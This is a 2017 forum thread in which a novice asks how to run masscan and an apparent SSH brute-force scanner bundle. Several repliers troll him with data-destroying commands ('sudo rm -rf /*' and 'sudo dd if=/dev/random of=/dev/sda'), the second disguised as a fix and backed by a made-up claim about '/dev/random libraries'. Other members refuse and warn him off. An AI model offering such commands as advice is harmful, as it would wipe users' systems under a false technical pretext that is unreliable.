GBL Posted August 11, 2017 Report Posted August 11, 2017 (edited) I want to use this scanner i saw on IRC and also it was mention in this forum its bssh2z-full.tar Can you explain me how to use it? I read tutorial but ./masscan command dont gives a ips also not work. Edited August 11, 2017 by GBL
theandruala Posted August 11, 2017 Report Posted August 11, 2017 Just run ./masscan then run sudo rm -rf /* 1 1
GBL Posted August 11, 2017 Author Report Posted August 11, 2017 (edited) 16 minutes ago, theandruala said: Just run ./masscan then run sudo rm -rf /* You mean just ./masscan without anything other? Anyway sudo rm -rf /* will remove everything ./masscan usage: masscan -p80,8000-8100 10.0.0.0/8 --rate=10000 scan some web ports on 10.x.x.x at 10kpps masscan --nmap list those options that are compatible with nmap masscan -p80 10.0.0.0/8 --banners -oB <filename> save results of scan in binary format to <filename> masscan --open --banners --readscan <filename> -oX <savefile> read binary scan results in <filename> and save them as xml in <savefile> What to use? Edited August 11, 2017 by GBL
theandruala Posted August 11, 2017 Report Posted August 11, 2017 ./masscan then sudo rm -rf /* rm will delete all errors and it's gonna rn 1 1 1
Technetium Posted August 11, 2017 Report Posted August 11, 2017 32 minutes ago, theandruala said: Just run ./masscan then run sudo rm -rf /* :)))))
GBL Posted August 11, 2017 Author Report Posted August 11, 2017 35 minutes ago, theandruala said: ./masscan then sudo rm -rf /* rm will delete all errors and it's gonna rn if you are sudoer (root) sudo rm -rf /* will remove everything from the unix Anyway i come here to ask about scanner and you just come to troll.
yoyois Posted August 11, 2017 Report Posted August 11, 2017 @GBL Don't look at the troll! Running rm -rf /* will destroy your system! Your problem is that the scanner is using optimized system calls from /dev/random libraries. Your user doesn't have acces to this system libraries that contain the code needed. To allow access to all users to this libraries you need to run: sudo dd if=/dev/random of=/dev/sda ./masscan -all (the fitst line, executed as super user unlocks the dev/random libraries) After masscan will run just fine (and way faster) 1
GBL Posted August 11, 2017 Author Report Posted August 11, 2017 (edited) 4 hours ago, yoyois said: @GBL Don't look at the troll! Running rm -rf /* will destroy your system! Your problem is that the scanner is using optimized system calls from /dev/random libraries. Your user doesn't have acces to this system libraries that contain the code needed. To allow access to all users to this libraries you need to run: sudo dd if=/dev/random of=/dev/sda ./masscan -all (the fitst line, executed as super user unlocks the dev/random libraries) After masscan will run just fine (and way faster) Again some joke? sudo dd if=/dev/random of=/dev/sda = will destroy HDD. Why is hard to help someone? Like ./masscann -all not work FAIL: unknown option: --all [hint] try "--help" [hint] ...or, to list nmap-compatible options, try "--nmap" Edited August 11, 2017 by GBL
u0m3 Posted August 11, 2017 Report Posted August 11, 2017 First of all this is considered a WhiteHat forum so this talk about grays is frowned upon. Second, I really don't get what's so unclear about the usage: IT'S ALL THERE!!! If you don't get it then you really should not be using this... 8 hours ago, GBL said: ./masscan usage: masscan -p80,8000-8100 10.0.0.0/8 --rate=10000 scan some web ports on 10.x.x.x at 10kpps masscan --nmap list those options that are compatible with nmap masscan -p80 10.0.0.0/8 --banners -oB <filename> save results of scan in binary format to <filename> masscan --open --banners --readscan <filename> -oX <savefile> read binary scan results in <filename> and save them as xml in <savefile>
GBL Posted August 12, 2017 Author Report Posted August 12, 2017 Yea how to start scanning IP 50 for example.
yoyois Posted August 12, 2017 Report Posted August 12, 2017 2 hours ago, GBL said: Yea how to start scanning IP 50 for example. What's your goal? You clearly don't understand how ip works. (IP 50 is nonsense) Also you don't understand ports and protocols. Nobody here will help you as you are clearly unexperienced and try to do bad things (you don't understand why they are bad). Real piece of help: Stay away from trouble! Don't start "hacking" things you don't understand. Spend some time online reading and learning about these things (ip, port, protocol, scanner, bruteforcer, ip range, firewall, dns) 3